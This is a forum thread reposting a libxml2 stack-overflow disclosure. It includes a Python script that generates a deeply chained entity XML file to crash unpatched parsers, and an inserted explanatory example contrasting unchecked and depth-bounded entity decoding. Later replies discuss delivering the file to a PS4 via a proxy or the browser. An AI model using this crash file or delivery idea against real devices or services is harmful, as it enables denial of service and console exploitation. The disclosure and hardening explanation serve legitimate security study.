Underground PS4 discussions
#405071 by dragood2
Wed May 04, 2016 6:05 am
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back, while working on a related bug [CVE-2016-3627], I
discovered that a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect it's an invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two-week embargo on the issue in case we didn't hear back.
As of yet we have had no response, so we have posted here.

We intend to keep the current embargo (ending May 3) unless we are
advised otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used to call xmlStringDecodeEntities() in a recursive context without incrementing the 'depth' counter in the parser context. Because of that omission, the parser failed to detect attribute recursions in certain documents before running out of stack space.

Hope this helps guide those that have the skill to take it further.
Last edited by dragood2 on Thu May 05, 2016 3:45 am, edited 2 times in total.
#405072 by dragood2
Wed May 04, 2016 6:06 am

# Writes repo.xml: a chain of entities, each expanding to a reference to the
# next one, deep enough to exhaust the parser's stack during decoding.
with open('repo.xml', 'w') as f:
    f.write("<!DOCTYPE a [ ")

    i = 1
    while i < 30000:
        # a1 -> &a2;, a2 -> &a3;, ... up to a29999 -> &a30000;
        f.write("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
        i = i + 1

    # After the loop i == 30000, so this declares a30001 (a30000 itself is never
    # declared); then close the DTD and reference the head of the chain from an
    # attribute value, which is where the recursive decode is triggered.
    f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")
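
The defect summarised in the post above (a recursive entity decode that never increments the depth counter), as an added illustration that is not part of the original post and is not libxml2's code: a toy DTD entity resolver in Python with the unchecked decoder beside one that carries a depth counter. The document builder mirrors what the posted script writes (a1 -> a2 -> ... with a30000 never declared), so the chain ends in an undefined reference that a bounded decoder reports and an unbounded one never reaches. The entity names, the builder, the MAX_DEPTH bound and the result labels are assumptions made for this example; Python reports a RecursionError where a C parser would overrun its stack and crash.

```python
# Added example, not code from the original post or from libxml2: a toy DTD
# entity resolver that reproduces the defect described in the thread (a
# recursive decode that never increments a depth counter) next to the
# hardened form.  Entity names, the document builder, MAX_DEPTH and the
# result labels are assumptions made for this illustration.
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&(\w+);')
MAX_DEPTH = 40          # assumed bound for the example; not libxml2's value


class EntityTooDeep(Exception):
    """Raised by the hardened decoder when nesting exceeds max_depth."""


def build_document(n=30000):
    """Construct the same document the posted script writes (constructed input):
    a1 -> a2 -> ... -> a(n-1) -> a(n), where a(n) is never declared, plus a
    dangling a(n+1) -> a1.  The chain therefore ends in an undefined reference."""
    parts = ["<!DOCTYPE a [ "]
    for i in range(1, n):
        parts.append('<!ENTITY a%d "&a%d;">' % (i, i + 1))
    parts.append('<!ENTITY a%d "&a1;">]> <bruces bogans="&a1;">' % (n + 1))
    return "".join(parts)


def parse_entities(doc):
    """Collect the internal-subset entity declarations into a name -> value map."""
    return {m.group(1): m.group(2) for m in ENTITY_DECL.finditer(doc)}


def expand_refs(value, resolve):
    """Replace every &name; in value with resolve(name).  A split is used rather
    than re.sub with a callback so that all recursion stays in Python frames."""
    parts = ENTITY_REF.split(value)          # literal, name, literal, name, ...
    return "".join(resolve(p) if i % 2 else p for i, p in enumerate(parts))


def decode_unchecked(entities, value):
    """Vulnerable form: recurses into each referenced entity with no depth
    bookkeeping.  The only thing that stops it is an undefined entity, and a
    long enough chain exhausts the stack before that point is ever reached."""
    def resolve(name):
        if name not in entities:
            raise ValueError("undefined entity &%s;" % name)
        return decode_unchecked(entities, entities[name])
    return expand_refs(value, resolve)


def decode_checked(entities, value, depth=0, max_depth=MAX_DEPTH):
    """Hardened form: depth is incremented on every nested decode and the
    decoder bails out once it passes max_depth, so loops and deep chains are
    rejected with bounded stack use."""
    if depth > max_depth:
        raise EntityTooDeep("entity nesting deeper than %d" % max_depth)

    def resolve(name):
        if name not in entities:
            raise ValueError("undefined entity &%s;" % name)
        return decode_checked(entities, entities[name], depth + 1, max_depth)
    return expand_refs(value, resolve)


def classify(decoder, entities, value):
    """Run a decoder on an attribute value and summarise how it ended.  Python
    raises RecursionError where a C parser would simply overrun its stack."""
    try:
        decoder(entities, value)
        return "ok"
    except RecursionError:
        return "stack exhausted"
    except EntityTooDeep:
        return "rejected: nesting too deep"
    except ValueError:
        return "rejected: undefined entity"


if __name__ == "__main__":
    for n in (10, 30000):
        ents = parse_entities(build_document(n))
        print("n=%d  unchecked: %s  | checked: %s" % (
            n,
            classify(decode_unchecked, ents, "&a1;"),
            classify(decode_checked, ents, "&a1;")))
```

With a short chain (n=10) both decoders reach the undefined a10 and reject the document; with the posted length both never get there, but the unchecked one runs out of stack while the checked one stops at depth 41 and reports the nesting. A genuine loop (a -> b -> a) behaves the same way. This models only the decode logic; to exercise the real library, feed the generated repo.xml to an unpatched libxml2 (for example via xmllint with --noent so entities are substituted) in a sandbox.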

#405077 by wololo
Wed May 04, 2016 9:56 pm
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)
#405078 by lazydog2055
Thu May 05, 2016 12:02 am
Looks like there was also an xml exploit in iOS and OS X. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the Web browser comes to be key.
